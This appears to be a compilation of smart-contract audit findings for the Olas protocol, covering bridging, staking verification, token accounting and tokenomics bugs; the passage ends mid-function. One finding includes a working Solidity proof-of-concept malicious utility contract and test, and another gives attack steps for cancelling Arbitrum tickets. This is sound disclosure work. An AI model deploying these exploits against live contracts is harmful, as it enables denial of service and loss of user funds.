https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/staking/WormholeDepositProcessorL1.sol#L96-L97

Vulnerability details

Relevant code: WormholeDepositProcessorL1::_sendMessage

Description

The deposit processors used for bridging on L1 work in 2 possible ways:

  • They can send tokens
  • Or send a message to L2 (in case of enough withheld tokens)

Some examples are GnosisDepositProcessorL1::_sendMessage:

if (transferAmount > 0) {
	...
    bytes memory data = abi.encode(targets, stakingIncentives);
    IBridge(l1TokenRelayer).relayTokensAndCall(olas, l2TargetDispenser, transferAmount, data); 
    ...
} else {
	...
    bytes32 iMsg = IBridge(l1MessageRelayer).requireToPassMessage(l2TargetDispenser, data, gasLimitMessage);
    ...
}

ArbitrumDepositProcessorL1::_sendMessage:

if (transferAmount > 0) {
	...
    IBridge(l1TokenRelayer).outboundTransferCustomRefund{value: cost[0]}(olas, refundAccount,
        l2TargetDispenser, transferAmount, TOKEN_GAS_LIMIT, gasPriceBid, submissionCostData);
}
...
sequence = IBridge(l1MessageRelayer).createRetryableTicket{value: cost[1]}(l2TargetDispenser, 0,
    maxSubmissionCostMessage, refundAccount, refundAccount, gasLimitMessage, gasPriceBid, data);

The same is true for Optimism and Polygon processors as well.

The only deposit processor that is not implemented like this is WormholeDepositProcessorL1. This means that every time we might want to only send a message, the token bridging flow will be triggered, which wastes additional resources on every call.

The other issue is that according to the Readme, one of the chains Olas is going to be deployed to is Solana. WormholeDepositProcessorL1 is the only way to send messages/tokens to the Solana chain. Thus, it should use the corresponding transferTokens function when wormholeTargetChainId points to a non-evm chain.

Root Cause

  1. Using token bridging when a simple cross-chain message is enough. The following function is always called:
sequence = sendTokenWithPayloadToEvm(uint16(wormholeTargetChainId), l2TargetDispenser, data, 0, gasLimitMessage, olas, transferAmount, uint16(l2TargetChainId), refundAccount);
  1. Always making function call for EVM-based chain, even though its possible that wormholeTargetChainId == 1 (Solana)

Impact

Users claiming fees for Staking contracts are forced to always use the token bridging flow and pay higher transaction fees than necessary. Over time overpaying in fees will sum up to a sizeable amount, especially considering the high dependency on cross-chain transactions.

WormholeDepositProcessorL1 does not work with non-EVM functions, even though it is planned to do so. This can cause loss of funds when distributing token incentives.

Suggested Mitigation

The l1MessageRelayer is able to send messages to EVM and non-EVM chains via sendPayloadToEvm and send respectively when transferAmount == 0.

Use transferTokens function call when bridging tokens to non-EVM chains.

Assessed type

Other

StackingFactory checks for incomplete initialization data after creating a new stacking instance

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingVerifier.sol#L179

Vulnerability details

Impact

The StackingBase contract initializes many important parameters.For example, parameters such as ServiceRegistry and activityChecker are crucial to the entire system.
If these parameters are maliciously set, but the contract can still be checked by StackingVerifier, it may have an impact on the system

Proof of Concept

github:https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingVerifier.sol#L179

    function verifyInstance(address instance, address implementation) external view returns (bool) {
        // If the implementations check is true, and the implementation is not whitelisted, the verification is failed
        if (implementationsCheck && !mapImplementations[implementation]) {
            return false;
        }

        // Check that instance is the contract when it is not checked against the implementation
        if (instance.code.length == 0) {
            return false;
        }

        // Check for the staking parameters
        // This is a must have parameter for all staking contracts
        uint256 rewardsPerSecond = IStaking(instance).rewardsPerSecond();
        if (rewardsPerSecond > rewardsPerSecondLimit) {
            return false;
        }

        // Check for the number of services
        // This is a must have parameter for all staking contracts
        uint256 numServices = IStaking(instance).maxNumServices();
        if (numServices > numServicesLimit) {
            return false;
        }

        // Check staking token
        // This is an optional check since there could be staking contracts with native tokens
        bytes memory tokenData = abi.encodeCall(IStaking.stakingToken, ());
        (bool success, bytes memory returnData) = instance.staticcall(tokenData);

        // Check the returnData is the call was successful
        if (success) {
            // The returned size must be 32 to fit one address
            if (returnData.length == 32) {
                address token = abi.decode(returnData, (address));
                if (token != olas) {
                    return false;
                }
            } else {
                return false;
            }
        }

        return true;
    }

The verifyInstance function only checks for rewards, PerSecond, numServices, and tokenData, lacking checks for important parameters such as ServiceRegistry and activityChecker

Tools Used

Manual audit

Recommended Mitigation Steps

Check the initialization of important parameters such as ServiceRegistry and activityChecker in the verifyInstance function

Assessed type

Invalid Validation

Malicious StakingToken instance can DoS deposits and control min deposit amount

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingFactory.sol#L230-L233
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingToken.sol#L54-L69
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingToken.sol#L74-L98

Vulnerability details

Relevant code: StakingFactory::createStakingInstance, StakingToken::initialize, StakingToken::_checkTokenStakingDeposit

Description

A StakingToken contract can be created permissionlessly by via the StakingFactory:

function createStakingInstance(
    address implementation,
    bytes memory initPayload
) external returns (address payable instance)

The first parameter is a whitelisted staking implementation and the second one encodes a function call to an initialize() function containing various parameters, one of which is serviceRegistryTokenUtility. This param is responsible for providing token info about services and bond of each agent in a service:

// Get the service staking token and deposit
(address token, uint96 stakingDeposit) = IServiceTokenUtility(serviceRegistryTokenUtility).mapServiceIdTokenDeposit(serviceId);
...
for (uint256 i = 0; i < serviceAgentIds.length; ++i) {
    uint256 bond = IServiceTokenUtility(serviceRegistryTokenUtility).getAgentBond(serviceId, serviceAgentIds[i]);
    ...
}

While most of the parameters' validity is checked in StakingFactory or StakingVerifier, the serviceRegistryTokenUtility isn't. Meaning, a malicious user can supply a custom implementation that will alter the behavior of a StakingToken instance.

Root Cause

Lack of validation for the activityChecker address when creating StakingToken contracts.

This issue does not affect StakingNativeToken instances as they don't have such a parameter.

Impact

A malicious actor can permissionlessly create a StakingToken contract with an altered implementation of IServiceTokenUtility. There are a few implications coming out of this:

  • The malicious actor can have service deposit or agent bond below the required minimum.
  • Service deposit token and StakingToken token can be different.
  • Honest protocol users can be DoSed from staking a service.

This issue is different from the one for distributing rewards to services with inactive multisigs because it relates only to StakingToken and is caused by modifying another parameter. Fixing one would not automatically fix the other.

PoC

The following PoC illustrates how the min service deposit condition can be tripped and how certain services can be denied staking.

Add the following file contracts/test/MaliciousServiceTokenUtility.sol:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

interface IServiceTokenUtility {
    function mapServiceIdTokenDeposit(uint256 serviceId) external view returns (address, uint96);
    function getAgentBond(uint256 serviceId, uint256 agentId) external view returns (uint256 bond);
}

contract MaliciousServiceTokenUtility is IServiceTokenUtility {
    IServiceTokenUtility original;
    address public owner;
    address public token;
    uint256 lowDepositServiceId; // priveliged service id
    uint256 blockedServiceId;    // DoSed service id

    constructor(address _original, address _token) {
        original = IServiceTokenUtility(_original);
        token = _token;
        owner = msg.sender;
    }

    function setServiceIds(uint256 _lowDepositServiceId, uint256 _blockedServiceId) public {
        require(msg.sender == owner, "not owner");
        lowDepositServiceId = _lowDepositServiceId;
        blockedServiceId = _blockedServiceId;
    }

    function mapServiceIdTokenDeposit(uint256 serviceId) external view returns (address, uint96) {
        if (serviceId == lowDepositServiceId) {
            return (token, type(uint96).max);
        } else if (serviceId == blockedServiceId) {
            return (address(0x1111111111111111111111111111111111111111), 0);
        } else {
            return original.mapServiceIdTokenDeposit(serviceId);
        }
    }

    function getAgentBond(uint256 serviceId, uint256 agentId) external view returns (uint256 bond) {
        if (serviceId == lowDepositServiceId) {
            return type(uint96).max;
        } else if (serviceId == blockedServiceId) {
            return 0;
        } else {
            return original.getAgentBond(serviceId, agentId);
        }
    }
}

Then, add the test below in ServiceStaking.js:

context("StakingToken manipulation", function () {
    it("Should arbitrarily DoS services and allow deposit below minimum", async function() {
        const maliciousServiceUtilityFactory = await ethers.getContractFactory('MaliciousServiceTokenUtility');
        let maliciousServiceUtility = await maliciousServiceUtilityFactory.deploy(serviceRegistryTokenUtility.address, token.address);
        
        await maliciousServiceUtility.setServiceIds(
            1, // service 1 will be able to deposit below minimum
            2  // service 2 will be DoSed
        );

        serviceParams.minStakingDeposit = ethers.utils.parseEther("100"); // 100 ether minimum deposit

        const StakingToken = await ethers.getContractFactory("StakingToken");
        stakingTokenImplementation = await StakingToken.deploy();
        initPayload = stakingTokenImplementation.interface.encodeFunctionData("initialize",
            [serviceParams, maliciousServiceUtility.address, token.address]);
        const stakingTokenAddress = await stakingFactory.callStatic.createStakingInstance(
            stakingTokenImplementation.address, initPayload);
        await stakingFactory.createStakingInstance(stakingTokenImplementation.address, initPayload);
        stakingToken = await ethers.getContractAt("StakingToken", stakingTokenAddress);
        
        // Approve and deposit token to the staking contract
        await token.approve(stakingToken.address, initSupply);
        await stakingToken.deposit(ethers.utils.parseEther("1"));

        // Approve services
        await serviceRegistry.approve(stakingToken.address, serviceId);
        await serviceRegistry.approve(stakingToken.address, serviceId + 1);

        // Stake service 1, even though minimum service deposit is 100 ether
        await stakingToken.stake(serviceId);
        expect(await serviceRegistry.ownerOf(serviceId)).to.eq(stakingToken.address);
        
        // Can't stake service 2, because MaliciousServiceTokenUtility returns wrong token address
        await expect(
            stakingToken.stake(serviceId + 1)
        ).to.be.revertedWithCustomError(stakingToken, "WrongStakingToken");
    });
});

Suggested Mitigation

There is already a contract responsible for verifying the validity of the StakingToken contract instance - StakingVerifier. The verifyInstance function should be modified to check if the correct ServiceTokenUtility has been set, similarly to how the staking token is checked, because not all staking contracts will have such field:

address serviceRegistryTokenUtility;
...
function verifyInstance(address instance, address implementation) external view returns (bool) {
	...
	bytes memory tokenData = 
	abi.encodeCall(IStaking.serviceRegistryTokenUtility, ());
	(bool success, bytes memory returnData) = 
	instance.staticcall(tokenData); 

	if (success) {
	    // returnData == serviceRegistryTokenUtility
	}
}

Assessed type

Invalid Validation

`StakingToken` may become insolvent when using a rebasing token

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingToken.sol#L108
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingToken.sol#L125

Vulnerability details

The StakingToken contract allows the protocol to deposit and withdraw staking rewards in an arbitrary ERC20 token to be distributed to eligible services. This contract is meant to support rebasing tokens as per the README and confirmed by the sponsor.

However, the contract's accounting logic is not compatible with rebasing tokens. Using a rebasing token for staking rewards will lead to incorrect tracking of balances and potential insolvency.

Rebasing tokens dynamically adjust balances of token holders based on a target price or other mechanism. This means the actual token balance of the contract can change between transactions, without any tokens being transferred in or out.

The StakingToken contract does not account for this. It tracks deposits and withdrawals using the balance variable, which it assumes will only change when deposit() and _withdraw() are called.

If stakingToken is a rebasing token, its balance can change between the time deposit() is called and the next interaction with the contract. This will cause balance to no longer reflect the actual token balance.

Over time, balance and availableRewards will diverge further and further from the real balance, possibly leading to a situation where _withdraw() attempts to send out more tokens than the contract holds.

Impact

If a rebasing token is used for staking rewards, the contract's accounting will become increasingly inaccurate over time. Withdrawals will fail if the token rebases down and the contract tries to send out more tokens than it owns.

If the token only ever rebases up or sends airdrops, the additional balance in the contract will not be reflected in the balance variable and will be unavailable to be distributed.

Proof of Concept

  1. Protocol deposits 1000 stakingToken into the contract via deposit(). balance and availableRewards are incremented by 1000.
  2. stakingToken rebases, decreasing all balances by 10%. The contract now actually holds 900 tokens.
  3. Protocol attempts to withdraw 1000 stakingToken via _withdraw() to distribute as staking rewards.
  4. The withdrawal fails because the contract only holds 900 tokens, less than the 1000 amount that _withdraw() tries to send.
  5. The transaction reverts and staking rewards cannot be distributed, breaking core functionality of the contract.

Tools Used

Manual review

Recommended Mitigation Steps

Properly supporting rebasing tokens would require significant changes to the contract's accounting logic. Instead of tracking balances and amounts directly, the contract would need to use a "shares" system.

Deposits would mint shares proportional to the deposited amount and the contract's current balance. Withdrawals would burn shares and send out an amount based on the share proportion.

However, given the complexity of these changes and the limited benefit, it may be advisable to simply not support rebasing tokens and document this limitation.

Assessed type

ERC20

GnosisDepositProcessor will never transfer the exact amount of tokens

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/staking/GnosisDepositProcessorL1.sol#L63-L70

Vulnerability details

Relevant code: GnosisDepositProcessorL1::_sendMessage

Description

The GnosisDepositProcessorL1 is responsible to bridge token incentives distributed from Dispenser to the Gnosis chain.

The bridging function call consists of the following parameters:

  • transferAmount which is the total amount of tokens to transfer (for all target services)
  • targets the addresses of the Staking contracts to receive funds
  • stakingIncentives an array of uint256 dictating how much each target service should receive
// Approve tokens for the bridge contract
IToken(olas).approve(l1TokenRelayer, transferAmount);

bytes memory data = abi.encode(targets, stakingIncentives);
IBridge(l1TokenRelayer).relayTokensAndCall(olas, l2TargetDispenser, transferAmount, data);

The issue is that the OmniBridge, used to send tokens will take a fee from the amount of tokens sent:

address nativeToken = nativeTokenAddress(_token);
uint256 fee = _distributeFee(HOME_TO_FOREIGN_FEE, nativeToken == address(0), _from, _token, _value);
uint256 valueToBridge = _value.sub(fee);

bytes memory data = _prepareMessage(nativeToken, _token, _receiver, valueToBridge, _data);

This means that when GnosisTargetDispenserL2 receives the message and tries to distribute the token incentives, the last deposit will not occur:

function _processData(bytes memory data) internal {
	...
	// Decode received data
	(address[] memory targets, uint256[] memory amounts) = abi.decode(data, (address[], uint256[]));
	for (uint256 i = 0; i < targets.length; ++i) {
	    address target = targets[i];
	    uint256 amount = amounts[i];
	    ...
	    // Check the OLAS balance and the contract being unpaused
	    if (IToken(olas).balanceOf(address(this)) >= amount && localPaused == 1) {
	        // Approve and transfer OLAS to the service staking target
	        IToken(olas).approve(target, amount);
	        IStaking(target).deposit(amount);
	        emit StakingTargetDeposited(target, amount);
	    } else {
	        // Hash of target + amount + batchNonce
	        bytes32 queueHash = keccak256(abi.encode(target, amount, batchNonce));
	        // Queue the hash for further redeem
	        stakingQueueingNonces[queueHash] = true;
	        emit StakingRequestQueued(queueHash, target, amount, batchNonce, localPaused);
	    }
	}
}

Root Cause

OmniBridge fees are unaccounted for. Contract assumes that all tokens would arrive at the target chain.

Impact

Staking contracts on Gnosis will not be able to automatically receive the token incentives. Every time tokens are bridged, one Staking contract will not get an automatic deposit. This increases the friction of using the protocol and prevents service owners to get their rewards on time.

PoC

Suppose someone calls Dispenser::claimStakingIncentives for a staking target located on the Gnosis chain.

It is calculated that 100 OLAS should be sent to the Staking contract.

When sending the message to GnosisDepositProcessorL1 the following values will be in place:

  • transferAmount = 100 OLAS
  • targets = [staking contract address] (array of 1 address)
  • stakingIncentives = [100e18] - amount to send to staking contract

As the tokens are bridged, a fee will be deducted from transferAmount and it will become 99.5 OLAS. Exact fee amount is without matter.

When the bridging callback is invoked in GnosisTargetDispenserL2 on Gnosis, this balance check will be false (assuming the contract is empty):

if (IToken(olas).balanceOf(address(this)) >= amount && localPaused == 1)

Which means that tokens would not be transferred. Instead, the Staking contract incentive would have to be manually claimed by calling redeem on GnosisTargetDispenserL2.

In case Dispenser::claimStakingIncentivesBatch is called on a bunch of Staking targets, the last one will not be able to receive automatically the deposit.

Suggested Mitigation

A possible solution would be to take into account the token fee when distributing incentives from Dispenser. This means that the IDepositProcessor interface would have to be modified to include a function like function tokenFee(uint256) external returns (uint256);

Then, _distributeStakingIncentives would look like:

...
// Transfer corresponding OLAS amounts to the deposit processor
if (transferAmount > 0) {
	transferAmount += IDepositProcessor(depositProcessor).tokenFee(transferAmount);
	IToken(olas).transfer(depositProcessor, transferAmount);
}
...

Assessed type

Other

StakingToken.sol doesn't properly handle FOT, rebasing tokens or those with variable which will lead to accounting issues downstream.

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingToken.sol#L125
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingToken.sol#L108

Vulnerability details

Impact

The protocol aims to work with all sorts of ERC20 tokens including tokens that charge a fee on transfer including PAXG. Deposits and withdrawals of these tokens when being used as staking tokens in StakingToken.sol are not properly handle which can cause a number of accounting issues most especially transfer of the losses due to fees to the last unstaker or reward claimer. The same effect, although to a less degree can be observed with tokens like stETH which has the 1 wei corner case issue in which the token amount transferred can be a bit less than the amount entered in. This also includes other rebasing tokens, and tokens with variable balances or airdrops as the direction of rebasing can lead to the same effect as FOT tokens, which token amount being less than internal accounting suggests, same as extra tokens from positive rebasing and airdrops being lost due it also not matching internal accounting and no other way to claim these tokens.

Proof of Concept

From the readme,

ERC20 token behaviors in scope
Fee on transfer Yes
Balance changes outside of transfers Yes

And looking at StakingToken.sol, we can see that the amount of the stakingToken is directly transferred as is and is also recorded into the contract's balance and avaliableRewards. Now if stakingToken is a token like PAXG that charges a fee on transfer, the actual amount transferred from msg.sender upon deposit will be different from amount received by StakingToken.sol and recorded into the balance/availableRewards. Here, there becomes a mismatch between the contract's accounting and the contract's actual balance.

    function deposit(uint256 amount) external {
        // Add to the contract and available rewards balances
        uint256 newBalance = balance + amount;
        uint256 newAvailableRewards = availableRewards + amount;

        // Record the new actual balance and available rewards
        balance = newBalance;
        availableRewards = newAvailableRewards;

        // Add to the overall balance
        SafeTransferLib.safeTransferFrom(stakingToken, msg.sender, address(this), amount);

        emit Deposit(msg.sender, amount, newBalance, newAvailableRewards);
    }

The same can be seen in _withdraw which is called when a user claims or unstakes. The amount the user receives will be less that he expects while the wrong amount is emitted to him.

    function _withdraw(address to, uint256 amount) internal override {
        // Update the contract balance
        balance -= amount;

        SafeTransferLib.safeTransfer(stakingToken, to, amount);

        emit Withdraw(to, amount);
    }

The ultimate effect will be seen during user claims and unstake in which a point will be reached where the stakingToken balance in the contract will be zero, while the internal accounting still registers that there are still rewards available for users to claim. In an attempt to rescue the situation, the protcol will incur extra costs in sending tokens to the StakingToken contract address to momentarily balance out the the token balance and the internal amount tracking. This same effect can be observed in rebasing tokens when they rebase negatively, or during the 1 wei corner case as actual available balance is less that accounting balance. Funds will also be lost if the contract incurs extra airdrops from the stakingToken or it positively rebases.

Tools Used

Manual code review

Recommended Mitigation Steps

Query token balance before and after transfers or disable support for these token types.
A skim function can also be introduced to remove any excess tokens from positive rebases.

Assessed type

Token-Transfer

QA Report

See the markdown file with the details of this report here.

Owner changes could not be applied if year changes in the middle of the epoch

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/Tokenomics.sol#L743
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/Tokenomics.sol#L1143
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/Tokenomics.sol#L1174
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/Tokenomics.sol#L1194

Vulnerability details

Vulnerability Detail

If the (owner) of the tokenomics contract would like to update the some params for the future epoch, owner notifies the contract by setting specific bits, let’s take a look how it is done in the changeIncentivesFractions. After all necessary changes, the following logic is done.

tokenomicsParametersUpdated = tokenomicsParametersUpdated | 0x02;

However, moving forward in the checkpoint function. Here, if the year changes in the middle of the epoch, it is necessary to adjust epoch inflation numbers to account for the year change. And finally, when the adjustment is made, the following logic is done.

tokenomicsParametersUpdated = tokenomicsParametersUpdated | 0x04

The problem is, that the during inflation adjustment the tokenomicsParametersUpdated is set to 0x04, which could lead to a problem in the initial (desired) updating by the owner. If the owner set tokenomicsParametersUpdated to some specific bits before the checkpoint, it will be checked in the checkpoint function and respective logic would be implemented.

For example;

if (tokenomicsParametersUpdated & 0x01 == 0x01) { //@audit 
      curEpochLen = nextEpochLen;
      epochLen = uint32(curEpochLen);
      nextEpochLen = 0;
   if (nextVeOLASThreshold > 0) {
          veOLASThreshold = nextVeOLASThreshold;
          nextVeOLASThreshold = 0;
      }
}

The same, with different bits.
if (tokenomicsParametersUpdated & 0x02 == 0x02) .…

if (tokenomicsParametersUpdated & 0x08 == 0x08) .…

Proof of Concept

  1. Owner would like to change tokenomics params for the next epoch. He calls changeTokenomicsParameters function and the tokenomicsParametersUpdated is set to 0x01

  2. The checkpoint is called. And the year changes in the middle of the epoch, so the adjustment happens and 0x04 is added to tokenomicsParametersUpdated

  3. Moving forward, when this check must be called, it would be skipped. Because the tokenomicsParametersUpdated no longer equal to the 0x01

    if (tokenomicsParametersUpdated & 0x01 == 0x01)

Impact

Owner changes wouldn’t be applied if year changes in the middle of the epoch in the checkpoint.

Recommendation

Make the updating checks more flexible, so nothing could break each other. Maybe it would be fair enough to use mapping.

Assessed type

Context

QA Report

See the markdown file with the details of this report here.

QA Report

See the markdown file with the details of this report here.

Attacker can cancel claimed staking incentives on Arbitrum

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/ArbitrumDepositProcessorL1.sol#L190-L191

Vulnerability details

The ArbitrumDepositProcessorL1 contract is responsible for bridging OLAS tokens and messages from L1 to the ArbitrumTargetDispenserL2 contract on Arbitrum. When calling claimStakingIncentives() or claimStakingIncentivesBatch() on the Dispenser contract for a nominee on Arbitrum, it creates a retryable ticket via the Inbox.createRetryableTicket() function to send a message to Arbitrum to process the claimed incentives.

However, when creating this retryable ticket, the refundAccount is passed as both the excessFeeRefundAddress and callValueRefundAddress parameters. As per the Arbitrum documentation and code, specifying the callValueRefundAddress gives that address a critical permission to cancel the retryable ticket on L2.

This means an attacker can perform the following steps:

  1. Call claimStakingIncentives() on the Dispenser contract for a nominee on Arbitrum
  2. Provide an insufficient gas limit in the bridgePayload to ensure the ticket fails and is not auto-redeemed
  3. As soon as the ticket becomes available to redeem on Arbitrum, call the ArbRetryableTx's cancel() precompile method
  4. This will cancel the message and render all the claimed incentives irredeemable

While the protocol could call processDataMaintenance() on L2 with the data from the cancelled message to recover, this would require passing a governance proposal. Given that this attack can be carried out any number of times (e.g. as often as possible and with a different target each time), this can considerably impact the functioning of the protocol hence I believe Medium severity is justified.

Impact

Attacker can grief the protocol by making legitimately claimed staking incentives irredeemable on L2. This would require governance intervention each time to recover the lost incentives.

Proof of Concept

  1. Attacker calls claimStakingIncentives() on the Dispenser contract for all nominees on Arbitrum, providing an insufficient gas limit and passing an EOA under their control as refundAccount in the bridgePayload
  2. Retryable ticket is created but fails to auto-redeem due to out of gas
  3. Once ticket is available to redeem on L2, attacker calls ArbRetryableTx.cancel() precompile method
  4. Message is cancelled and staking incentives are not redeemable on L2

Tools Used

Manual review

Recommended Mitigation Steps

Since no call value is ever sent with the ticket, the callValueRefundAddress can be left empty when creating the retryable ticket or an admin address passed instead, if the protocol wants to reserve the right to cancel tickets.

Assessed type

Access Control

Staking contract emissions limit can be bypassed by multiple deposits

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L160-L186
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingBase.sol#L356
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingBase.sol#L266
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingVerifier.sol#L247
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingVerifier.sol#L256

Vulnerability details

The DefaultTargetDispenserL2 abstract contract is the base class for all contracts responsible for distributing OLAS tokens to staking contracts on L2. When processing a batch of deposits, it calls verifyInstanceAndGetEmissionsAmount() on the StakingFactory to check if each staking contract is valid and to get the maximum emissions amount allowed for that contract.

The verifyInstanceAndGetEmissionsAmount() function returns the lower of:

  1. The emissionsAmount() returned by the staking contract instance, which is calculated on initialization based on the _stakingParams
  2. The amount returned by StakingVerifier.getEmissionsAmountLimit(instance), which returns a fixed limit defined when the staking limits are changed

The issue is that both of these amounts only depend on the current configuration, and do not take into account any tokens already deposited into the staking contract. This means that the intended emissions limit can be trivially bypassed by simply spreading deposits across multiple batches.

Impact

Some staking contracts could receive a larger share of OLAS emissions than others, depending on when they claim their staking incentives. This could lead to an uneven distribution of rewards among stakers.

While total emissions are still bounded by other protocol limits, the ability to bypass the per-instance limit could undermine the intended incentive structure. Stakers who are aware of this issue could gain an advantage over those who are not.

Proof of Concept

  1. Assume the StakingVerifier emissions limit is set to 1000 tokens for a certain staking contract
  2. User calls Dispenser.claimStakingIncentives() with that staking contract as the target when the incentives reach 1000 tokens
  3. verifyInstanceAndGetEmissionsAmount() passes and the 1000 tokens are deposited
  4. User calls Dispenser.claimStakingIncentives() again with the same target and another 1000 tokens
  5. verifyInstanceAndGetEmissionsAmount() passes again since it only looks at the current config, allowing the second 1000 token deposit
  6. The staking contract has now received 2000 tokens, bypassing the 1000 token limit

Tools Used

Manual review

Recommended Mitigation Steps

The emissions limit check should take into account tokens already deposited into the staking contract.

One way to do this would be to add a depositedAmount state variable to the staking contracts that gets incremented in the deposit() function. The verifyInstanceAndGetEmissionsAmount() function could then check depositedAmount in addition to the config-based limits.

Alternatively, DefaultTargetDispenserL2 could track deposited amounts itself in a mapping and consult that as part of the emissions limit check.

The exact mitigation depends on the intended scope of the limit - whether it's meant to be a lifetime limit or a per-period limit. But in either case, already deposited amounts need to be factored in.

Assessed type

Other

Removed nominee doesn't receive staking incentives for the epoch in which they were removed which is against the intended behaviour

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/Dispenser.sol#L393
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/Dispenser.sol#L849
https://github.com/code-423n4/2024-05-olas/blame/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/Dispenser.sol#L774

Vulnerability details

Impact

If a nominee is removed in the ith epoch then they are eligible to receive staking incentives for the ith epoch if they had enough staking weight but due to current implementation the removed nominee would never receive staking incentives for the ith epoch thus causing loss of staking incentives for the nominee. It is evident from the code that it is intended that the nominee is eligible to receive staking incentives for the epoch when it was removed.Plus I have also asked from the sponsers and they have agreed too that nominee is eligible to receive incentives for that epoch.

Proof of Concept

Following is calculateStaking incentives function

function calculateStakingIncentives(
        uint256 numClaimedEpochs,
        uint256 chainId,
        bytes32 stakingTarget,
        uint256 bridgingDecimals
    ) public returns (
        uint256 totalStakingIncentive,
        uint256 totalReturnAmount,
        uint256 lastClaimedEpoch,
        bytes32 nomineeHash
    ) {
        // Check for the correct chain Id
        if (chainId == 0) {
            revert ZeroValue();
        }

        // Check for the zero address
        if (stakingTarget == 0) {
            revert ZeroAddress();
        }

        // Get the staking target nominee hash
        nomineeHash = keccak256(abi.encode(IVoteWeighting.Nominee(stakingTarget, chainId)));

        uint256 firstClaimedEpoch;
        (firstClaimedEpoch, lastClaimedEpoch) =
            _checkpointNomineeAndGetClaimedEpochCounters(nomineeHash, numClaimedEpochs);

        // Checkpoint staking target nominee in the Vote Weighting contract
        IVoteWeighting(voteWeighting).checkpointNominee(stakingTarget, chainId);

        // Traverse all the claimed epochs
        for (uint256 j = firstClaimedEpoch; j < lastClaimedEpoch; ++j) {
            // Get service staking info
            ITokenomics.StakingPoint memory stakingPoint =
                ITokenomics(tokenomics).mapEpochStakingPoints(j);

            uint256 endTime = ITokenomics(tokenomics).getEpochEndTime(j);

            // Get the staking weight for each epoch and the total weight
            // Epoch endTime is used to get the weights info, since otherwise there is a risk of having votes
            // accounted for from the next epoch
            // totalWeightSum is the overall veOLAS power (bias) across all the voting nominees
            (uint256 stakingWeight, uint256 totalWeightSum) =
                IVoteWeighting(voteWeighting).nomineeRelativeWeight(stakingTarget, chainId, endTime);

            uint256 stakingIncentive;
            uint256 returnAmount;

            // Adjust the inflation by the maximum amount of veOLAS voted for service staking contracts
            // If veOLAS power is lower, it reflects the maximum amount of OLAS allocated for staking
            // such that all the inflation is not distributed for a minimal veOLAS power
            uint256 availableStakingAmount = stakingPoint.stakingIncentive;

            uint256 stakingDiff;
            if (availableStakingAmount > totalWeightSum) {
                stakingDiff = availableStakingAmount - totalWeightSum;
                availableStakingAmount = totalWeightSum;
            }

            // Compare the staking weight
            // 100% = 1e18, in order to compare with minStakingWeight we need to bring it from the range of 0 .. 10_000
            if (stakingWeight < uint256(stakingPoint.minStakingWeight) * 1e14) {
                // If vote weighting staking weight is lower than the defined threshold - return the staking incentive
                returnAmount = ((stakingDiff + availableStakingAmount) * stakingWeight) / 1e18;
            } else {
                // Otherwise, allocate staking incentive to corresponding contracts
                stakingIncentive = (availableStakingAmount * stakingWeight) / 1e18;
                // Calculate initial return amount, if stakingDiff > 0
                returnAmount = (stakingDiff * stakingWeight) / 1e18;

                // availableStakingAmount is not used anymore and can serve as a local maxStakingAmount
                availableStakingAmount = stakingPoint.maxStakingAmount;
                if (stakingIncentive > availableStakingAmount) {
                    // Adjust the return amount
                    returnAmount += stakingIncentive - availableStakingAmount;
                    // Adjust the staking incentive
                    stakingIncentive = availableStakingAmount;
                }

                // Normalize staking incentive if there is a bridge decimals limiting condition
                // Note: only OLAS decimals must be considered
                if (bridgingDecimals < 18) {
                    uint256 normalizedStakingAmount = stakingIncentive / (10 ** (18 - bridgingDecimals));
                    normalizedStakingAmount *= 10 ** (18 - bridgingDecimals);
                    // Update return amounts
                    // stakingIncentive is always bigger or equal than normalizedStakingAmount
